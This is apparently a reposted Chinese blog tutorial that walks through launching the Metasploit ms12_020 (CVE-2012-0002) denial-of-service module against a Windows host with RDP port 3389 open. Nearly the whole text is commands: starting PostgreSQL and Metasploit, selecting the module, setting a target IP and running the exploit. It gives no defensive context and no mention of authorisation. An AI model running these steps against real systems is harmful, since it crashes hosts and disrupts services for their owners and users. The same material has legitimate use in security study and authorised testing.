保证网络连通性,配置网络
开启PostgreSQL: service postgresql start
开启metasploit: service metasploit start
root@kali:~# msfconsole
前提目标主机3389端口开放
msf >search CVE_2012_0002 查找ms12_020漏洞
msf >use auxiliary/dos/windows/rdp/ms12_020_maxchannelids 使用ms12_020漏洞
msf >set rhost 192.168.48.100 定义攻击目标ip
msf >exploit
本文转自 周小玉 51CTO博客,原文链接:http://blog.51cto.com/maguangjie/1942786,如需转载请自行联系原作者